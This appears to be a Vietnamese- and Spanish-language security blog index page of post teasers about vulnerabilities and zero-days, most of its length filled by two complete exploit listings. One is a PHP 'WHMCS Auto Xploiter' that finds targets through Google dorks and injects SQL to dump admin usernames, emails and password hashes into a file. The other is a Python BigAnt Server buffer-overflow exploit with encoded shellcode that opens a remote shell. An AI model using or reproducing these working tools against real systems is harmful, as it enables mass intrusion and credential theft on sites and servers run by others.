Lỗ hổng trong GKPlugin cho phép Hacker đọc nội dung mã nguồn của website

GKPlugin hay còn có tên Gác Kiếm Player là một plugin hỗ trợ phát video, tệp tin media từ các trang lưu trữ video khác trên trang của bạn. GKPlugins được phát triển trên JWPlayer, cho phép chạy audio, video từ những máy chủ khác bởi đầu vào là một liên kết trực tiếp trên thanh địa chỉ của trình duyệt.

Với khả năng phát tệp tin đa phương tiện từ nhiều nguồn khác nhau và dễ dàng tùy biến như thêm Logo vào trình phát hay thay đổi giao diện cho phù hợp với trang, do đó GKPlugin được yêu thích và sử dụng tại nhiều trang xem phim trực tuyến hiện nay. Và việc nó được phát triển trên nền JWPlayer – là một player được ưa chuộng đã giúp GKPlugin trở nên phổ biến hơn.

Trong quá trình phân tích mã nguồn GKPlugins, K-20 đã phát hiện ra lỗ hổng cho phép tải và đọc nội dung tệp tin mã nguồn bất kì của Website sử dụng plugin này.

READ MORE »

Lỗ hổng trong Facebook SDK khiến hàng triệu tài khoản người dùng gặp nguy hiểm

Các nhà nghiên cứu bảo mật từ MetaIntell và Giám đốc Quản Lý Rủi Ro Điện Thoại  (MRM) vừa mới phát hiện một lỗ hổng bảo mật lớn  trên phiên bản mới nhất của Facebook SDK khiến hàng triệu thẻ xác thực (Token Authentication) của người dùng gặp nguy hiểm.

Facebook SDK dùng trên hệ điều hành Android và iOS là cách dễ nhất để tích hợp các ứng dụng di động với nền tảng Facebook hỗ trợ người dùng truy cập vào Facebook để tương tác với các Facebook API và còn rất nhiều tính năng khác.

READ MORE »

[PHP] WHMCS 0-day Auto Exploiter <= 5.2.8

<?php
/*
*****************************************************
  WHMCS 0day Auto Exploiter <= 5.2.8
  Coded by g00n - Skype: t3hg00n
   wwww.xploiter.net
*****************************************************
Preview:
http://i.imgur.com/qB726Gm.png
In action:
http://i.imgur.com/oNpZAf6.png
http://i.imgur.com/gFlBjtD.png
*****************************************************
*/

set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
function getAlexa($url)
{
 $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
 $rank1 = $xml->SD[1];
 if($rank1)
  $rank = $rank1->POPULARITY->attributes()->TEXT;
 else
  $rank = 0;
 return $rank;
}
 
function google_that($query, $page=1)
{
 $resultPerPage=8;
 $start = $page*$resultPerPage;
 $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
 $resultFromGoogle = json_decode( http_get($url, true) ,true);
 if(isset($resultFromGoogle['responseStatus'])) {
  if($resultFromGoogle['responseStatus'] != '200') return false;
  if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  else return $resultFromGoogle['responseData']['results'];
 }
 else
  die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}
 
function http_get($url, $safemode = false){
 if($safemode === true) sleep(1);
 $im = curl_init($url);
 curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
 curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($im, CURLOPT_HEADER, 0);
 return curl_exec($im);
 curl_close();
}

function check_vuln($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);

$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
 curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
 curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
 curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
 curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
 $source = curl_exec($curl_connection);
 preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
 if($infoz[0]) {
  return $infoz[0];
 }
 else
  return "Fail!";
}
else
 return "Fail!";
}
?>
<html>
<head>
<title>WHMCS Auto Xploiter - by g00n</title>
</head>
<body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">

<STYLE>
textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border   : dashed 1px;
border-color  : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border   : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
 SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin   : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
 COLOR: White; TEXT-DECORATION: none
}
A:visited {
 COLOR: White; TEXT-DECORATION: none
}
A:hover {
 color: Red; TEXT-DECORATION: none
}
A:active {
 color: Red; TEXT-DECORATION: none
}

#result{margin:10px;}
#result span{display:block;}
#result .Y{background-color:green;}
#result .X{background-color:red;}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>
</td></table></tr>
<br>
<br>
<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
    <style>
      body {
        font-family: 'Audiowide', serif;
        font-size: 30px;
  
      }
    </style>
  </head>

  <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
    <center>
<font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
<br>
<font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
</font>
<br><br>

<table border=1 bordercolor=red>
<tr>
<td width="700">
<br />
<center>
 <form method="post">
  Google Dork:   
  <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
    <input type="submit" value="Xploit!" id="button"/>
 </form>
<?php
 if(isset($_POST['dork']{0})) {
  $file = fopen("WMCS-Hashes.txt","a");
  echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';   
  letItBy();   
  for($googlePage = 1; $googlePage <= 50; $googlePage++) {
   $googleResult = google_that($_POST['dork'], $googlePage);
   if(!$googleResult) {
    echo 'Finished scanning.';
    fclose($file);
    break;
   }
   
   for($victim = 0; $victim < sizeof($googleResult); $victim++){
    $result = check_vuln($googleResult[$victim]['unescapedUrl']);
    $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
    if($result != "Fail!") {
     $hashes = "";
     foreach ($result as $record) {
      $hashes = $hashes . str_replace(':::::','',$record) . "\n";
     }
     $sep = "========================================================\n";
     $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
     fwrite($file,$data);
     echo "<br /><font color=\"green\">Successfully Xploited...</font>";
     echo '<span class="Y">';
     echo "<pre>" . $data . "</pre></span><br />";
     
    }
    else {
    echo '<span class="X">';
    echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
    echo "</span>\n<br />";
    }
    letItBy();
   }
  }
  echo '</div>';
 }
?>
</center>
</td>
</table>
<br /><br />
<font face="Audiowide" color="red" size="2">
Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
<br > <font color="green">For more tools/scripts/exploits/etc.</font>
<br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
</font>

</center>
</body>
</html>

Source: http://pastebin.com/cuikqkhA

[Video] vBulletin Install Auto Exploiter Modified Script

Chào các bạn!

Sau khi đọc thông tin về lỗ hổng bảo mật này tại đây thì mình đã tìm hiểu, đọc mã nguồn vBulletin và viết thử script khai thác. Làm luôn cái video cho các bạn dễ hình dung nhé. Công cụ khai thác sẽ được tích hợp vào Juno_okyo's Blog trong thời gian tới! :)

READ MORE »

Exploit Facebook Via External Plugins and Modules

#############################################################
# Title: Exploit Facebook Via External Plugins and Modules  
# Exploitation: Manually (use your brain ^_^)
# Date:  28/03/2013 
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################

READ MORE »

PHP Audit - El Arte de encontrar 0-days en Aplicaciones Webs

Esta vez, vamos a ver algo sobre 0-days, gracias a un amigo con el seudónimo Join7 del foro ZentrixPlus donde ha realizado un tutorial en la cual explica detalladamente como encontrar 0-days en aplicaciones webs.

READ MORE »

Exploiting New Java 0-day with Metasploit

Se ha descubierto una nueva vulnerabilidad (0-day) en las versiones de Java 7 Update 10 y anteriores, que permite a un atacante ejecutar código arbitrario en cualquier sistema operativo que cuente con esta version de Java. Actualmente esta versión es la ultima actualización  por lo tanto el 90% de los usuarios de Internet lo tienen instalado y el 50% de estos no tienen conocimiento sobre el riesgo que pueden estan corriendo.

READ MORE »

Multiple MySQL database Zero-day vulnerabilities published

Researcher discovered Multiple Zero-day vulnerabilities in MySQL database software including Stack based buffer overrun, Heap Based Overrun, Privilege Elevation, Denial of Service and  Remote Preauth User Enumeration.

READ MORE »

BigAnt Server 2.52 SEH (0day)

# Title: BigAnt Server 2.52 SEH (0day)
# EDB-ID: 10765
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Lincoln
# Published: 2009-12-29
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
#!/usr/bin/python
import socket, sys

#########################
#BigAnt version 2.52 0day
#Tested on XPSP2 & Win2k3 SP2
#Discovered by Lincoln
#Thanks to muts & remote-exploit
#
#650 or so bytes available after seh, easier to jump back
#
#root@BT4VM:~# ./bigant.py 192.168.87.130
#Exploit sent! Connect to remote host on port 4444
#
#root@BT4VM:~# nc -vn 192.168.87.130 4444
#(UNKNOWN) [192.168.87.130] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#© Copyright 1985-2001 Microsoft Corp.
#
#C:\WINDOWS\system32>
#########################


#[*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x46\x46\x32\x46\x42\x4b\x58\x45\x34\x4e\x43\x4b\x38\x4e\x37"
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x48"
"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x53\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x4a\x42\x45\x37\x45\x4e\x4b\x58"
"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x43\x50\x4e\x52\x4b\x38"
"\x49\x58\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x38\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x48"
"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x35\x4a\x36"
"\x50\x48\x50\x44\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x46\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x37\x43\x47"
"\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e"
"\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x35\x43\x55\x43\x55\x43\x34"
"\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x41"
"\x4e\x45\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x41\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41"
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"
"\x42\x35\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56"
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x36\x48\x36\x4a\x36\x43\x56"
"\x4d\x56\x49\x58\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x52\x4e\x4c"
"\x49\x58\x47\x4e\x4c\x36\x46\x34\x49\x38\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x32"
"\x43\x49\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
"\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x55\x47\x45\x44\x45\x41\x45\x41\x35\x41\x55\x4c\x36"
"\x41\x30\x41\x45\x41\x45\x45\x35\x41\x35\x4f\x4f\x42\x4d\x4a\x46"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

host = sys.argv[1]

# p/p/r from vbajet32.dll
buffer = "\x90" * 218 + sc + "\x90" * 35 + "\xeb\x06\x90\x90" + "\x95\x32\x9a\x0f"
buffer += "\x90" * 10 + "\xe9\x7c\xfc\xff\xff" + "\x90" * 650

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 6660)) #hardcoded default port
s.send("USV " + buffer + "\r\n\r\n")
print "Exploit sent! Connect to remote host on port 4444\n"
s.close()